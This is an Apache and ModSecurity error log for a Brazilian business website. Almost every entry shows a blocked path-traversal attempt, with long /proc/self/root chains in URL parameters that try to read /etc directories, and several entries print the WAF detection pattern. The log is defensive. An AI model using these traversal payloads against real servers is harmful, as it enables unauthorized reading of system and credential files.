[Wed Mar 18 09:36:21.011269 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:39272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcRfu8EFLIOrSqIpv4rgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:36:23.080274 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:33440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcRta6ubjKNq_cu4aMwgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:36:23.092334 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.241.31:60510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcRkzinOy1jxa1j4cIGgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:36:26.005058 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:33442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcSvu8EFLIOrSqIpv4uAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:36:27.342396 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:33444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcSymAPhZkrhU8w4lg_AAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:36:27.823159 2026] [mime_magic:error] [pid 15051:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:60784] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:36:34.359234 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:33456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcUuyqAr6etmhZHNqzHQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:36:38.216268 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:48892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcVta6ubjKNq_cu4aM1QAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:36:38.595574 2026] [mime_magic:error] [pid 11816:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:33206] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:36:44.121761 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:33042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcXCmAPhZkrhU8w4lhCgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:37:22.924422 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 74.7.243.128:33058] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/bin
[Wed Mar 18 09:37:35.591576 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:60518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcj9Y0UrI5A3LftIyYiQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:37:48.875527 2026] [mime_magic:error] [pid 15051:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:57874] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 09:38:09.633837 2026] [mime_magic:error] [pid 17887:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:36696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:38:17.778816 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.228.61:53932] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqcuda6ubjKNq_cu4aNFgAAA0M"]
[Wed Mar 18 09:38:18.451288 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.244.43:56788] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqcukzinOy1jxa1j4cItwAAARI"]
[Wed Mar 18 09:38:25.019058 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:54368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcweyqAr6etmhZHNqziwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:27.699074 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:42956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcw_u8EFLIOrSqIpv5LwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:28.992776 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:42968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcxOw_le52K8_3pV3T4QAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:31.884488 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:58500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcxkzinOy1jxa1j4cIxQAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:33.590369 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:58504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcyfu8EFLIOrSqIpv5OAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:34.968522 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:58506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcyuoXxyEfFpUF8f9iiAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:47.239196 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:58514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc1-yqAr6etmhZHNqzpQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:48.610945 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:52442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc2Na6ubjKNq_cu4aNMAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:50.889797 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:52552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc2eoXxyEfFpUF8f9ilAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:38:52.517369 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:52564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqc3OoXxyEfFpUF8f9imAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
